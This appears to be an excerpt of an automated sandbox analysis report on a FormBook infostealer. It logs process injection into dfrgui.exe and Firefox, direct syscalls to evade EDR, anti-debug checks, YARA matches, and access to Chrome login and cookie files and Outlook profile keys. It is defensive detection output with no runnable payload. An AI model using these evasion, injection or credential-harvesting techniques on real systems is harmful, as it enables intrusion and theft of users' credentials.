Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe TID: 1648	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe TID: 1648	Thread sleep time: -48000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\dfrgui.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\dfrgui.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\dfrgui.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Source: C:\Windows\SysWOW64\dfrgui.exe

Code function: 8_2_61E35333 sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,

8_2_61E35333

Source: C:\Users\user\AppData\Roaming\sharon48399.scr

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Roaming\sharon48399.scr

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Roaming\sharon48399.scr

Code function: 6_2_00C60101 rdtsc

6_2_00C60101

Source: C:\Users\user\AppData\Roaming\sharon48399.scr

Code function: 6_2_00418BA3 LdrLoadDll,

6_2_00418BA3

Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C000EA mov eax, dword ptr fs:[00000030h]	6_2_00C000EA
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C00080 mov ecx, dword ptr fs:[00000030h]	6_2_00C00080
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C226F8 mov eax, dword ptr fs:[00000030h]	6_2_00C226F8

Source: C:\Users\user\AppData\Roaming\sharon48399.scr

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 5.2.sharon48399.scr.2267b24.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 5.2.sharon48399.scr.2267b24.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 5.2.sharon48399.scr.2267b24.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtQueryInformationProcess: Direct from: 0x774CFAFA	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtCreateUserProcess: Direct from: 0x774D093E	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtCreateKey: Direct from: 0x774CFB62	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtQuerySystemInformation: Direct from: 0x774D20DE	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtQueryDirectoryFile: Direct from: 0x774CFDBA	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtClose: Direct from: 0x774CFA02
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtWriteVirtualMemory: Direct from: 0x774D213E	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtCreateFile: Direct from: 0x774D00D6	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtSetTimer: Direct from: 0x774D021A	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtOpenFile: Direct from: 0x774CFD86	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtSetInformationThread: Direct from: 0x774E9893	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtOpenKeyEx: Direct from: 0x774CFA4A	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtAllocateVirtualMemory: Direct from: 0x774CFAE2	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtResumeThread: Direct from: 0x774D008D	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtOpenKeyEx: Direct from: 0x774D103A	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtUnmapViewOfSection: Direct from: 0x774CFCA2	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtDelayExecution: Direct from: 0x774CFDA1	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtSetInformationProcess: Direct from: 0x774CFB4A	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtSetInformationThread: Direct from: 0x774CF9CE	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtReadFile: Direct from: 0x774CF915	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtMapViewOfSection: Direct from: 0x774CFC72	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtCreateThreadEx: Direct from: 0x774D08C6	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtDeviceIoControlFile: Direct from: 0x774CF931	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtRequestWaitReplyPort: Direct from: 0x753C6BCE	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtQueryValueKey: Direct from: 0x774CFACA	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtOpenSection: Direct from: 0x774CFDEA	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtProtectVirtualMemory: Direct from: 0x774D005A	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtWriteVirtualMemory: Direct from: 0x774CFE36	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtRequestWaitReplyPort: Direct from: 0x756F8D92	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtQueryVolumeInformationFile: Direct from: 0x774CFFAE	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtNotifyChangeKey: Direct from: 0x774D0F92	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtQueryAttributesFile: Direct from: 0x774CFE7E	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtReadVirtualMemory: Direct from: 0x774CFEB2	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtSetTimer: Direct from: 0x774E98D5	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtSetInformationFile: Direct from: 0x774CFC5A	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	NtQuerySystemInformation: Direct from: 0x774CFDD2	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\sharon48399.scr

Memory written: C:\Users\user\AppData\Roaming\sharon48399.scr base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Section loaded: NULL target: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	Section loaded: NULL target: C:\Users\user\AppData\Roaming\sharon48399.scr protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	Section loaded: NULL target: C:\Windows\SysWOW64\dfrgui.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: NULL target: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: NULL target: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\dfrgui.exe

Thread APC queued: target process: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\sharon48399.scr "C:\Users\user\AppData\Roaming\sharon48399.scr"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process created: C:\Users\user\AppData\Roaming\sharon48399.scr "C:\Users\user\AppData\Roaming\sharon48399.scr"	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	Process created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000000.390196949.0000000000940000.00000002.00000001.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000002.878473124.0000000000940000.00000002.00000001.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000000.418876983.0000000000B30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000000.390196949.0000000000940000.00000002.00000001.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000002.878473124.0000000000940000.00000002.00000001.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000000.418876983.0000000000B30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000000.390196949.0000000000940000.00000002.00000001.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000002.878473124.0000000000940000.00000002.00000001.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000000.418876983.0000000000B30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: !Progman

Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Queries volume information: C:\Users\user\AppData\Roaming\sharon48399.scr VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\q4y4nra8.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\q4y4nra8.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\q4y4nra8.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\q4y4nra8.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\q4y4nra8.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\q4y4nra8.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\q4y4nra8.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\q4y4nra8.zip VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\dfrgui.exe

Code function: 8_2_61EAF420 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

8_2_61EAF420

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 6.2.sharon48399.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.sharon48399.scr.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.878242341.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.405827300.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.481797908.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.878328572.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.878421508.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.878315434.00000000002F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.406051877.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.878564779.0000000002860000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\dfrgui.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 6.2.sharon48399.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.sharon48399.scr.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.878242341.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.405827300.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.481797908.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.878328572.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.878421508.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.878315434.00000000002F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.406051877.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.878564779.0000000002860000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E1307A sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,	8_2_61E1307A
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E9727C sqlite3_exec,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_exec,	8_2_61E9727C
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E2D5A1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,	8_2_61E2D5A1
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E2D519 sqlite3_bind_pointer,sqlite3_mutex_leave,	8_2_61E2D519
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E2D4E8 sqlite3_bind_null,sqlite3_mutex_leave,	8_2_61E2D4E8
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E2D4C2 sqlite3_bind_int,sqlite3_bind_int64,	8_2_61E2D4C2
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E2D473 sqlite3_bind_int64,sqlite3_mutex_leave,	8_2_61E2D473
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E2D422 sqlite3_bind_double,sqlite3_mutex_leave,	8_2_61E2D422
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E0B431 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,	8_2_61E0B431
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E037F3 sqlite3_value_frombind,	8_2_61E037F3
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E2D7D2 sqlite3_bind_text64,	8_2_61E2D7D2
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E2D7A3 sqlite3_bind_text,	8_2_61E2D7A3
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E2D774 sqlite3_bind_blob64,	8_2_61E2D774
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E2D745 sqlite3_bind_blob,	8_2_61E2D745
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E2D60E sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,	8_2_61E2D60E
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E2D93D sqlite3_bind_value,	8_2_61E2D93D
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E038CA sqlite3_bind_parameter_count,	8_2_61E038CA
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E158CA sqlite3_bind_parameter_index,	8_2_61E158CA
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E038DC sqlite3_bind_parameter_name,	8_2_61E038DC
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E2D83D sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,	8_2_61E2D83D
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E2D80E sqlite3_bind_text16,	8_2_61E2D80E
